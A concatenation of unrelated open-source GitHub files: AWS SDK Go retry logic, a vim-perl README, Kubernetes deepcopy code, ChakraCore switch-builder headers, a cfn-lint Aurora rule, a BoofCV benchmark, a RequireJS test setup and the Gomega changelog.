[1.0 roadmap]: /docs/contributing/1.0-roadmap
[project scope]: /docs/contributing/project-scope
[project structure]: /docs/contributing/project-structure
[initial design]: /docs/design/initial
[github]: https://github.com/
[golang]: https://golang.org/doc/install
[docker]: https://www.docker.com/
[install docker]: https://docs.docker.com/install/#supported-platforms
[community]: https://github.com/kubernetes/community
[contributor]: https://github.com/kubernetes/community/blob/master/contributors/guide/README.md
[Kubernetes Slack]: http://slack.k8s.io/
[#kind]: https://kubernetes.slack.com/messages/CEKK1KTN2/
[@BenTheElder]: https://github.com/BenTheElder
[@munnerz]: https://github.com/munnerz
[community page]: http://kubernetes.io/community/
[modules]: https://github.com/golang/go/wiki/Modules
[SIG-Testing Mailing List]: https://groups.google.com/forum/#!forum/kubernetes-sig-testing
| {
"pile_set_name": "Github"
} |
package request
import (
"time"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/awserr"
)
// Retryer is an interface to control retry logic for a given service.
// The default implementation used by most services is the client.DefaultRetryer
// structure, which contains basic retry logic using exponential backoff.
type Retryer interface {
	// RetryRules returns the delay to wait before the request is retried.
	RetryRules(*Request) time.Duration

	// ShouldRetry reports whether the request should be attempted again.
	ShouldRetry(*Request) bool

	// MaxRetries returns the maximum number of retries permitted.
	MaxRetries() int
}
// WithRetryer sets a config Retryer value to the given Config returning it
// for chaining. The passed-in cfg is mutated in place.
func WithRetryer(cfg *aws.Config, retryer Retryer) *aws.Config {
	cfg.Retryer = retryer
	return cfg
}
// retryableCodes is a collection of service response codes which are retry-able
// without any further action (no credential refresh or backoff category applies).
var retryableCodes = map[string]struct{}{
	"RequestError":            {},
	"RequestTimeout":          {},
	ErrCodeResponseTimeout:    {},
	"RequestTimeoutException": {}, // Glacier's flavor of RequestTimeout
}
// throttleCodes is a collection of service response codes which indicate the
// request was throttled by the service and may succeed if retried later.
var throttleCodes = map[string]struct{}{
	"ProvisionedThroughputExceededException": {},
	"Throttling":                             {},
	"ThrottlingException":                    {},
	"RequestLimitExceeded":                   {},
	"RequestThrottled":                       {},
	"TooManyRequestsException":               {}, // Lambda functions
	"PriorRequestNotComplete":                {}, // Route53
}
// credsExpiredCodes is a collection of error codes which signify the credentials
// need to be refreshed. Expired tokens require refreshing of credentials, and
// resigning before the request can be retried.
var credsExpiredCodes = map[string]struct{}{
	"ExpiredToken":          {},
	"ExpiredTokenException": {},
	"RequestExpired":        {}, // EC2 Only
}
// isCodeThrottle reports whether code identifies a throttling response.
func isCodeThrottle(code string) bool {
	_, throttled := throttleCodes[code]
	return throttled
}
// isCodeRetryable reports whether code is retryable, either directly or
// because it signals expired credentials (which can be refreshed and retried).
func isCodeRetryable(code string) bool {
	_, retryable := retryableCodes[code]
	return retryable || isCodeExpiredCreds(code)
}
// isCodeExpiredCreds reports whether code signals expired credentials.
func isCodeExpiredCreds(code string) bool {
	_, expired := credsExpiredCodes[code]
	return expired
}
// validParentCodes lists the wrapper error codes whose nested (original)
// error is inspected when deciding retryability.
var validParentCodes = map[string]struct{}{
	ErrCodeSerialization: {},
	ErrCodeRead:          {},
}
// temporaryError matches errors (such as net.Error) that can report whether
// the failure is temporary and therefore worth retrying.
type temporaryError interface {
	Temporary() bool
}
// isNestedErrorRetryable reports whether the error wrapped inside parentErr
// is retryable. Only wrapper codes listed in validParentCodes are unwrapped.
func isNestedErrorRetryable(parentErr awserr.Error) bool {
	if parentErr == nil {
		return false
	}

	// Only inspect the nested error for known wrapper codes.
	if _, ok := validParentCodes[parentErr.Code()]; !ok {
		return false
	}

	err := parentErr.OrigErr()
	if err == nil {
		return false
	}

	// Nested AWS errors are judged by their own code.
	if aerr, ok := err.(awserr.Error); ok {
		return isCodeRetryable(aerr.Code())
	}

	// Errors that self-report as temporary are retryable.
	if t, ok := err.(temporaryError); ok {
		return t.Temporary()
	}

	// Fall back to detecting connection-reset style failures.
	return isErrConnectionReset(err)
}
// IsErrorRetryable returns whether the error is retryable, based on its Code.
// Returns false if error is nil.
func IsErrorRetryable(err error) bool {
	if err == nil {
		return false
	}
	aerr, ok := err.(awserr.Error)
	if !ok {
		return false
	}
	return isCodeRetryable(aerr.Code()) || isNestedErrorRetryable(aerr)
}
// IsErrorThrottle returns whether the error is to be throttled based on its code.
// Returns false if error is nil.
func IsErrorThrottle(err error) bool {
	if err == nil {
		return false
	}
	aerr, ok := err.(awserr.Error)
	if !ok {
		return false
	}
	return isCodeThrottle(aerr.Code())
}
// IsErrorExpiredCreds returns whether the error code is a credential expiry error.
// Returns false if error is nil.
func IsErrorExpiredCreds(err error) bool {
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
return isCodeExpiredCreds(aerr.Code())
}
}
return false
}
// IsErrorRetryable returns whether the error is retryable, based on its Code.
// Returns false if the request has no Error set.
//
// Alias for the utility function IsErrorRetryable
func (r *Request) IsErrorRetryable() bool {
return IsErrorRetryable(r.Error)
}
// IsErrorThrottle returns whether the error is to be throttled based on its code.
// Returns false if the request has no Error set.
//
// Alias for the utility function IsErrorThrottle
func (r *Request) IsErrorThrottle() bool {
return IsErrorThrottle(r.Error)
}
// IsErrorExpired returns whether the error code is a credential expiry error.
// Returns false if the request has no Error set.
//
// Note: the method name differs from the helper it wraps (IsErrorExpiredCreds).
//
// Alias for the utility function IsErrorExpiredCreds
func (r *Request) IsErrorExpired() bool {
return IsErrorExpiredCreds(r.Error)
}
| {
"pile_set_name": "Github"
} |
# vim-perl
[](https://travis-ci.org/vim-perl/vim-perl)
This is the aggregation of all the various Perl-related syntax and
helper files for Perl 5.
For Perl 6 files, please see [vim-perl6](https://github.com/vim-perl/vim-perl6).
# Installation
You can install vim-perl using
* [Pathogen](https://github.com/tpope/vim-pathogen) and git submodules
* [Vundle](https://github.com/gmarik/vundle)
* [VAM](https://github.com/MarcWeber/vim-addon-manager)
* [vim-plug](https://github.com/junegunn/vim-plug)
All of these plugin managers have been tested and work; please read each manager's documentation on its own site.
The legacy installation method is to run `make install`, which installs the
.vim files into your `~/.vim` directory.
## Installing using [vim-plug](https://github.com/junegunn/vim-plug)
In your `.vimrc`:
call plug#begin('~/.vim/plugged')
Plug 'vim-perl/vim-perl', { 'for': 'perl', 'do': 'make clean carp dancer highlight-all-pragmas moose test-more try-tiny' }
call plug#end()
Re-source your configuration, do `PlugInstall`, and you're done.
The `do` argument is optional, and can be used
if you want to enable any of the optional sub-syntaxes.
The `perl` argument is also optional, and only required if you want to
lazy-load the plugin only if dealing with Perl files.
# Getting Help
Any bug reports/feature requests/patches should be directed to the [vim-perl group](https://groups.google.com/group/vim-perl).
When reporting bugs in the highlighting of items, please include an example file as well
as a screenshot demonstrating the problem.
# FAQ
## Can you add highlighting for Moose, Try::Tiny, Test::More, SQL in strings, etc?
We have syntax "extensions" under the `contrib/` directory; you can find custom highlighting
for these sorts of things there. To enable any of them, just drop the relevant
file in a `after/syntax/perl` directory visible to vim.
$ cp contrib/dancer.vim ~/.vim/after/syntax/perl/
You can also populate the local `after/syntax/perl/` via `make`:
$ make dancer moose
$ ls after/syntax/perl
dancer.vim moose.vim
## Curly braces inside of regexes/strings are considered when I use %
(See also [GH #86](https://github.com/vim-perl/vim-perl/issues/86))
Vim itself only considers double quotes in this scenario; the matchit plugin, however,
can deal with this scenario and vim-perl's files are set up to work with it should you
choose to use it.
| {
"pile_set_name": "Github"
} |
// +build !ignore_autogenerated
/*
Copyright The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by deepcopy-gen. DO NOT EDIT.
package v1
import (
corev1 "k8s.io/api/core/v1"
runtime "k8s.io/apimachinery/pkg/runtime"
)
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *StorageClass) DeepCopyInto(out *StorageClass) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ObjectMeta.DeepCopyInto(&out.ObjectMeta)
// Each `in, out := &in.Field, &out.Field` below shadows the receiver
// variables so that the pointer/map/slice field gets its own deep copy
// rather than aliasing the original.
if in.Parameters != nil {
in, out := &in.Parameters, &out.Parameters
*out = make(map[string]string, len(*in))
for key, val := range *in {
(*out)[key] = val
}
}
if in.ReclaimPolicy != nil {
in, out := &in.ReclaimPolicy, &out.ReclaimPolicy
*out = new(corev1.PersistentVolumeReclaimPolicy)
**out = **in
}
if in.MountOptions != nil {
in, out := &in.MountOptions, &out.MountOptions
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.AllowVolumeExpansion != nil {
in, out := &in.AllowVolumeExpansion, &out.AllowVolumeExpansion
*out = new(bool)
**out = **in
}
if in.VolumeBindingMode != nil {
in, out := &in.VolumeBindingMode, &out.VolumeBindingMode
*out = new(VolumeBindingMode)
**out = **in
}
if in.AllowedTopologies != nil {
in, out := &in.AllowedTopologies, &out.AllowedTopologies
*out = make([]corev1.TopologySelectorTerm, len(*in))
for i := range *in {
(*in)[i].DeepCopyInto(&(*out)[i])
}
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new StorageClass.
func (in *StorageClass) DeepCopy() *StorageClass {
if in == nil {
return nil
}
out := new(StorageClass)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *StorageClass) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *StorageClassList) DeepCopyInto(out *StorageClassList) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ListMeta.DeepCopyInto(&out.ListMeta)
if in.Items != nil {
in, out := &in.Items, &out.Items
*out = make([]StorageClass, len(*in))
// Element-wise deep copy: StorageClass contains pointer/map fields
// that a plain slice copy would alias.
for i := range *in {
(*in)[i].DeepCopyInto(&(*out)[i])
}
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new StorageClassList.
func (in *StorageClassList) DeepCopy() *StorageClassList {
if in == nil {
return nil
}
out := new(StorageClassList)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *StorageClassList) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *VolumeAttachment) DeepCopyInto(out *VolumeAttachment) {
*out = *in
out.TypeMeta = in.TypeMeta
// Spec and Status each contain pointer fields, so they delegate to their
// own generated DeepCopyInto instead of being copied by assignment.
in.ObjectMeta.DeepCopyInto(&out.ObjectMeta)
in.Spec.DeepCopyInto(&out.Spec)
in.Status.DeepCopyInto(&out.Status)
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new VolumeAttachment.
func (in *VolumeAttachment) DeepCopy() *VolumeAttachment {
if in == nil {
return nil
}
out := new(VolumeAttachment)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *VolumeAttachment) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *VolumeAttachmentList) DeepCopyInto(out *VolumeAttachmentList) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ListMeta.DeepCopyInto(&out.ListMeta)
if in.Items != nil {
in, out := &in.Items, &out.Items
*out = make([]VolumeAttachment, len(*in))
for i := range *in {
(*in)[i].DeepCopyInto(&(*out)[i])
}
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new VolumeAttachmentList.
func (in *VolumeAttachmentList) DeepCopy() *VolumeAttachmentList {
if in == nil {
return nil
}
out := new(VolumeAttachmentList)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *VolumeAttachmentList) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *VolumeAttachmentSource) DeepCopyInto(out *VolumeAttachmentSource) {
*out = *in
// Pointer fields are cloned into fresh allocations so the copy does not
// alias the original's memory.
if in.PersistentVolumeName != nil {
in, out := &in.PersistentVolumeName, &out.PersistentVolumeName
*out = new(string)
**out = **in
}
if in.InlineVolumeSpec != nil {
in, out := &in.InlineVolumeSpec, &out.InlineVolumeSpec
*out = new(corev1.PersistentVolumeSpec)
(*in).DeepCopyInto(*out)
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new VolumeAttachmentSource.
func (in *VolumeAttachmentSource) DeepCopy() *VolumeAttachmentSource {
if in == nil {
return nil
}
out := new(VolumeAttachmentSource)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *VolumeAttachmentSpec) DeepCopyInto(out *VolumeAttachmentSpec) {
*out = *in
in.Source.DeepCopyInto(&out.Source)
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new VolumeAttachmentSpec.
func (in *VolumeAttachmentSpec) DeepCopy() *VolumeAttachmentSpec {
if in == nil {
return nil
}
out := new(VolumeAttachmentSpec)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *VolumeAttachmentStatus) DeepCopyInto(out *VolumeAttachmentStatus) {
*out = *in
if in.AttachmentMetadata != nil {
in, out := &in.AttachmentMetadata, &out.AttachmentMetadata
*out = make(map[string]string, len(*in))
for key, val := range *in {
(*out)[key] = val
}
}
// AttachError and DetachError are optional; each is cloned into a new
// VolumeError only when present.
if in.AttachError != nil {
in, out := &in.AttachError, &out.AttachError
*out = new(VolumeError)
(*in).DeepCopyInto(*out)
}
if in.DetachError != nil {
in, out := &in.DetachError, &out.DetachError
*out = new(VolumeError)
(*in).DeepCopyInto(*out)
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new VolumeAttachmentStatus.
func (in *VolumeAttachmentStatus) DeepCopy() *VolumeAttachmentStatus {
if in == nil {
return nil
}
out := new(VolumeAttachmentStatus)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *VolumeError) DeepCopyInto(out *VolumeError) {
*out = *in
in.Time.DeepCopyInto(&out.Time)
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new VolumeError.
func (in *VolumeError) DeepCopy() *VolumeError {
if in == nil {
return nil
}
out := new(VolumeError)
in.DeepCopyInto(out)
return out
}
| {
"pile_set_name": "Github"
} |
//-------------------------------------------------------------------------------------------------------
// Copyright (C) Microsoft. All rights reserved.
// Licensed under the MIT license. See LICENSE.txt file in the project root for full license information.
//-------------------------------------------------------------------------------------------------------
#pragma once
/**
 * The object that handles actions generated by a SwitchIRBuilder, which
 * will be either an IRBuilder or an IRBuilderAsmJs
 */
struct SwitchAdapter {
    // Virtual destructor: this is a polymorphic base (see the adapters below),
    // so destroying an implementation through a SwitchAdapter pointer would be
    // undefined behavior without one.
    virtual ~SwitchAdapter() {}

    // Adds a branch instruction at 'offset' whose target is 'targetOffset'.
    virtual void AddBranchInstr(IR::BranchInstr * instr, uint32 offset, uint32 targetOffset, bool clearBackEdge = false) = 0;
    // Adds a non-branch instruction at the given offset.
    virtual void AddInstr(IR::Instr * instr, uint32 offset) = 0;
    // Records a relocation entry for a branch whose target block may not exist yet.
    virtual void CreateRelocRecord(IR::BranchInstr * branchInstr, uint32 offset, uint32 targetOffset, bool clearBackEdge = false) = 0;
    // Converts 'instr' into a bailout instruction of the given kind.
    virtual void ConvertToBailOut(IR::Instr * instr, IR::BailOutKind kind) = 0;
};
/**
 * Handles delegating actions generated by a SwitchIRBuilder to an IRBuilder
 */
struct IRBuilderSwitchAdapter : public SwitchAdapter {
private:
// Non-owning pointer to the IRBuilder all calls are forwarded to.
IRBuilder * m_builder;
public:
IRBuilderSwitchAdapter(IRBuilder * builder)
: m_builder(builder) {}
// SwitchAdapter interface; each method forwards to m_builder (see .cpp).
virtual void AddBranchInstr(IR::BranchInstr * instr, uint32 offset, uint32 targetOffset, bool clearBackEdge = false);
virtual void AddInstr(IR::Instr * instr, uint32 offset);
virtual void CreateRelocRecord(IR::BranchInstr * branchInstr, uint32 offset, uint32 targetOffset, bool clearBackEdge = false);
virtual void ConvertToBailOut(IR::Instr * instr, IR::BailOutKind kind);
};
/**
 * Handles delegating actions generated by a SwitchIRBuilder to an IRBuilderAsmJs
 */
#ifdef ASMJS_PLAT
struct IRBuilderAsmJsSwitchAdapter : public SwitchAdapter {
private:
// Non-owning pointer to the asm.js IR builder all calls are forwarded to.
IRBuilderAsmJs * m_builder;
public:
IRBuilderAsmJsSwitchAdapter(IRBuilderAsmJs * builder)
: m_builder(builder) {}
// SwitchAdapter interface; each method forwards to m_builder (see .cpp).
virtual void AddBranchInstr(IR::BranchInstr * instr, uint32 offset, uint32 targetOffset, bool clearBackEdge = false);
virtual void AddInstr(IR::Instr * instr, uint32 offset);
virtual void CreateRelocRecord(IR::BranchInstr * branchInstr, uint32 offset, uint32 targetOffset, bool clearBackEdge = false);
virtual void ConvertToBailOut(IR::Instr * instr, IR::BailOutKind kind);
};
#endif
/**
 * Handles construction of switch statements, with appropriate optimizations. Note that some of these
 * optimizations occur during IR building (rather than GlobOpt) because the abstraction of a switch/case
 * block is not maintained with the resulting IR. Thus, some optimizations must occur during this phase.
 */
class SwitchIRBuilder {
private:
typedef JsUtil::List<CaseNode*, JitArenaAllocator> CaseNodeList;
typedef JsUtil::List<JITJavascriptString *, JitArenaAllocator> StrSwitchCaseList;
// Destination builder (IRBuilder or IRBuilderAsmJs) that receives all generated instructions.
SwitchAdapter* m_adapter;
Func* m_func;
JitArenaAllocator* m_tempAlloc;
// Case nodes collected for the switch currently being built.
CaseNodeList* m_caseNodes;
bool m_seenOnlySingleCharStrCaseNodes;
IR::Instr * m_profiledSwitchInstr;
bool m_isAsmJs;
bool m_switchOptBuildBail; //bool refers to whether the bail out has to be generated or not
bool m_switchIntDynProfile; // bool refers to whether dynamic profile info says that the switch expression is an integer or not
bool m_switchStrDynProfile; // bool refers to whether dynamic profile info says that the switch expression is a string or not
BVSparse<JitArenaAllocator> * m_intConstSwitchCases;
StrSwitchCaseList * m_strConstSwitchCases;
// Comparison/arithmetic opcodes used when lowering cases; presumably selected
// in Init() based on the asm.js flag — confirm in the implementation file.
Js::OpCode m_eqOp;
Js::OpCode m_ltOp;
Js::OpCode m_leOp;
Js::OpCode m_gtOp;
Js::OpCode m_geOp;
Js::OpCode m_subOp;
public:
SwitchIRBuilder(SwitchAdapter * adapter)
: m_adapter(adapter)
, m_profiledSwitchInstr(nullptr)
, m_switchOptBuildBail(false)
, m_switchIntDynProfile(false)
, m_switchStrDynProfile(false)
, m_isAsmJs(false)
, m_seenOnlySingleCharStrCaseNodes(true) {}
void Init(Func * func, JitArenaAllocator * tempAlloc, bool isAsmJs);
// BeginSwitch/OnCase/EndSwitch form the main driver sequence for one switch statement.
void BeginSwitch();
void EndSwitch(uint32 offset, uint32 targetOffset);
void SetProfiledInstruction(IR::Instr * instr, Js::ProfileId profileId);
void OnCase(IR::RegOpnd * src1Opnd, IR::Opnd * src2Opnd, uint32 offset, uint32 targetOffset);
void FlushCases(uint32 targetOffset);
void RefineCaseNodes();
void ResetCaseNodes();
void BuildCaseBrInstr(uint32 targetOffset);
void BuildBinaryTraverseInstr(int start, int end, uint32 defaultLeafBranch);
void BuildLinearTraverseInstr(int start, int end, uint32 defaultLeafBranch);
void BuildEmptyCasesInstr(CaseNode* currCaseNode, uint32 defaultLeafBranch);
void BuildOptimizedIntegerCaseInstrs(uint32 targetOffset);
void BuildMultiBrCaseInstrForStrings(uint32 targetOffset);
void FixUpMultiBrJumpTable(IR::MultiBranchInstr * multiBranchInstr, uint32 targetOffset);
void TryBuildBinaryTreeOrMultiBrForSwitchInts(IR::MultiBranchInstr * &multiBranchInstr, uint32 fallthrOffset,
int startjmpTableIndex, int endjmpTableIndex, int startBinaryTravIndex, uint32 targetOffset);
bool TestAndAddStringCaseConst(JITJavascriptString * str);
void BuildBailOnNotInteger();
void BuildBailOnNotString();
IR::MultiBranchInstr * BuildMultiBrCaseInstrForInts(uint32 start, uint32 end, uint32 targetOffset);
};
| {
"pile_set_name": "Github"
} |
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: MIT-0
"""
import six
from cfnlint.rules import CloudFormationLintRule
from cfnlint.rules import RuleMatch
class AuroraDBInstanceProperties(CloudFormationLintRule):
    """Aurora DB instances have a lot of properties that can't be set and vice versa"""
    id = 'E3029'
    shortdesc = 'Aurora instances don\'t require certain properties'
    # Fixed user-visible typo: "reuqired" -> "required".
    description = 'Certain properties are not required when using the Aurora engine for AWS::RDS::DBInstance'
    source_url = 'https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-rds-database-instance.html'
    tags = ['resources', 'rds']

    # Properties that must not be specified on an Aurora-engine DB instance.
    aurora_not_required_props = [
        'AllocatedStorage',
        'BackupRetentionPeriod',
        'CopyTagsToSnapshot',
        'DeletionProtection',
        'EnableIAMDatabaseAuthentication',
        'MasterUserPassword',
        'StorageEncrypted',
    ]

    # Engine values that identify an Aurora DB instance.
    aurora_engines = [
        'aurora',
        'aurora-mysql',
        'aurora-postgresql',
    ]

    def __init__(self):
        """Init"""
        super(AuroraDBInstanceProperties, self).__init__()
        self.resource_property_types = ['AWS::RDS::DBInstance']

    def check(self, properties, path, cfn):
        """Flag disallowed properties for every condition-resolved property set.

        Returns a list of RuleMatch, one per offending property occurrence.
        """
        matches = []

        property_sets = cfn.get_object_without_conditions(
            properties, ['Engine'] + self.aurora_not_required_props)
        for property_set in property_sets:
            properties = property_set.get('Object')
            scenario = property_set.get('Scenario')
            engine_sets = properties.get_safe('Engine', type_t=six.string_types)
            for engine, _ in engine_sets:
                if engine not in self.aurora_engines:
                    continue
                for prop in properties:
                    if prop not in self.aurora_not_required_props:
                        continue
                    path_prop = path[:] + [prop]
                    message = 'You cannot specify {} for Aurora AWS::RDS::DBInstance at {}'
                    if scenario is None:
                        matches.append(
                            RuleMatch(path_prop, message.format(prop, '/'.join(map(str, path_prop)))))
                    else:
                        # Include the condition values that make this property set active.
                        scenario_text = ' and '.join(
                            ['when condition "%s" is %s' % (k, v) for (k, v) in scenario.items()])
                        matches.append(
                            RuleMatch(path_prop, message.format(prop, '/'.join(map(str, path_prop)) + ' ' + scenario_text)))
        return matches

    def match_resource_properties(self, properties, _, path, cfn):
        """Entry point invoked by cfn-lint for AWS::RDS::DBInstance resources."""
        matches = []
        matches.extend(self.check(properties, path, cfn))
        return matches
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2011-2019, Peter Abeles. All Rights Reserved.
*
* This file is part of BoofCV (http://boofcv.org).
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package boofcv.alg.interpolate;
import boofcv.alg.misc.GImageMiscOps;
import boofcv.concurrency.BoofConcurrency;
import boofcv.factory.interpolate.FactoryInterpolation;
import boofcv.struct.border.BorderType;
import boofcv.struct.image.GrayF32;
import org.openjdk.jmh.annotations.*;
import java.util.Random;
import java.util.concurrent.TimeUnit;
/**
 * Benchmark for interpolating on a per-pixel basis.
 *
 * @author Peter Abeles
 */
@BenchmarkMode(Mode.AverageTime)
@OutputTimeUnit(TimeUnit.MILLISECONDS)
@Warmup(iterations = 2)
@Measurement(iterations = 5)
@State(Scope.Benchmark)
@Fork(value = 1)
public class BenchmarkInterpolatePixel {
    @Param({"true", "false"})
    public boolean concurrent;

    // @Param({"100", "500", "1000", "5000", "10000"})
    @Param({"5000"})
    public int size;

    // NOTE: JMH injects @Param values after construction, so 'size' is still 0
    // when these initializers run; setup() reshapes both images to the injected
    // size before any benchmark iteration executes.
    GrayF32 inputF32 = new GrayF32(size, size);
    GrayF32 outputF32 = new GrayF32(size, size);

    // Defines the fixed sub-region the interpolation is sampled over.
    // Made final: they are constants and must not drift between iterations.
    static final float start = 10.1f;
    static final float end = 310.1f;
    static final float step = 1f;

    InterpolatePixelS<GrayF32> bilinear_sb;
    InterpolatePixelS<GrayF32> nearest_sb;

    /** Configures concurrency, fills the input with random data, and builds the interpolators. */
    @Setup
    public void setup() {
        BoofConcurrency.USE_CONCURRENT = concurrent;
        Random rand = new Random(234);

        inputF32.reshape(size, size);
        outputF32.reshape(size, size);
        GImageMiscOps.fillUniform(inputF32, rand, 0, 200);

        bilinear_sb = FactoryInterpolation.bilinearPixelS(GrayF32.class, BorderType.EXTENDED);
        nearest_sb = FactoryInterpolation.nearestNeighborPixelS(GrayF32.class);
    }

    /** Bilinear interpolation sampled across the region at sub-pixel positions. */
    @Benchmark
    public void bilinear_F32() {
        for (float x = start; x <= end; x += step)
            for (float y = start; y <= end; y += step)
                bilinear_sb.get(x, y);
    }

    /** Nearest-neighbor interpolation sampled across the same region. */
    @Benchmark
    public void nn_F32() {
        for (float x = start; x <= end; x += step)
            for (float y = start; y <= end; y += step)
                nearest_sb.get(x, y);
    }
}
| {
"pile_set_name": "Github"
} |
// RequireJS configuration: resolve module IDs relative to ./scripts/ and load
// jQuery 1.4.4 from the Microsoft CDN (the Google CDN line is kept as an
// alternative), loading jQuery with priority before other modules.
require({
"baseUrl": "./scripts/",
"paths": {
"jquery": "http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.4.min"
//"jquery": "http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min"
},
priority: ['jquery']
});
// Load two jQuery plugins, then on DOM-ready assert (twice) that the epsilon
// plugin is installed and returns 'epsilon'. doh is the assertion framework
// and readyFired presumably notifies the test harness — both defined externally.
define(["jquery.gamma", "jquery.epsilon"], function() {
$(function () {
doh.is('epsilon', $('body').epsilon());
doh.is('epsilon', $('body').epsilon());
readyFired();
});
});
| {
"pile_set_name": "Github"
} |
## 1.10.1
### Fixes
- Update dependencies (#389) [9f5eecd]
## 1.10.0
### Features
- Add HaveHTTPStatusMatcher (#378) [f335c94]
- Changed matcher for content-type in VerifyJSONRepresenting (#377) [6024f5b]
- Make ghttp usable with x-unit style tests (#376) [c0be499]
- Implement PanicWith matcher (#381) [f8032b4]
## 1.9.0
### Features
- Add ContainElements matcher (#370) [2f57380]
- Output missing and extra elements in ConsistOf failure message [a31eda7]
- Document method LargestMatching [7c5a280]
## 1.8.1
### Fixes
- Fix unexpected MatchError() behaviour (#375) [8ae7b2f]
## 1.8.0
### Features
- Allow optional description to be lazily evaluated function (#364) [bf64010]
- Support wrapped errors (#359) [0a981cb]
## 1.7.1
### Fixes
- Bump go-yaml version to cover fixed ddos heuristic (#362) [95e431e]
## 1.7.0
### Features
- export format property variables (#347) [642e5ba]
### Fixes
- minor fix in the documentation of ExpectWithOffset (#358) [beea727]
## 1.6.0
### Features
- Display special chars on error [41e1b26]
- Add BeElementOf matcher [6a48b48]
### Fixes
- Remove duplication in XML matcher tests [cc1a6cb]
- Remove unnecessary conversions (#357) [7bf756a]
- Fixed import order (#353) [2e3b965]
- Added missing error handling in test (#355) [c98d3eb]
- Simplify code (#356) [0001ed9]
- Simplify code (#354) [0d9100e]
- Fixed typos (#352) [3f647c4]
- Add failure message tests to BeElementOf matcher [efe19c3]
- Update go-testcov untested sections [37ee382]
- Mark all uncovered files so go-testcov ./... works [53b150e]
- Reenable gotip in travis [5c249dc]
- Fix the typo of comment (#345) [f0e010e]
- Optimize contain_element_matcher [abeb93d]
## 1.5.0
### Features
- Added MatchKeys matchers [8b909fc]
### Fixes and Minor Improvements
- Add type aliases to remove stuttering [03b0461]
- Don't run session_test.go on windows (#324) [5533ce8]
## 1.4.3
### Fixes:
- ensure file name and line numbers are correctly reported for XUnit [6fff58f]
- Fixed matcher for content-type (#305) [69d9b43]
## 1.4.2
### Fixes:
- Add go.mod and go.sum files to define the gomega go module [f3de367, a085d30]
- Work around go vet issue with Go v1.11 (#300) [40dd6ad]
- Better output when using with go XUnit-style tests, fixes #255 (#297) [29a4b97]
- Fix MatchJSON fail to parse json.RawMessage (#298) [ae19f1b]
- show threshold in failure message of BeNumericallyMatcher (#293) [4bbecc8]
## 1.4.1
### Fixes:
- Update documentation formatting and examples (#289) [9be8410]
- allow 'Receive' matcher to be used with concrete types (#286) [41673fd]
- Fix data race in ghttp server (#283) [7ac6b01]
- Travis badge should only show master [cc102ab]
## 1.4.0
### Features
- Make string pretty diff user configurable (#273) [eb112ce, 649b44d]
### Fixes
- Use httputil.DumpRequest to pretty-print unhandled requests (#278) [a4ff0fc, b7d1a52]
- fix typo floa32 > float32 (#272) [041ae3b, 6e33911]
- Fix link to documentation on adding your own matchers (#270) [bb2c830, fcebc62]
- Use setters and getters to avoid race condition (#262) [13057c3, a9c79f1]
- Avoid sending a signal if the process is not alive (#259) [b8043e5, 4fc1762]
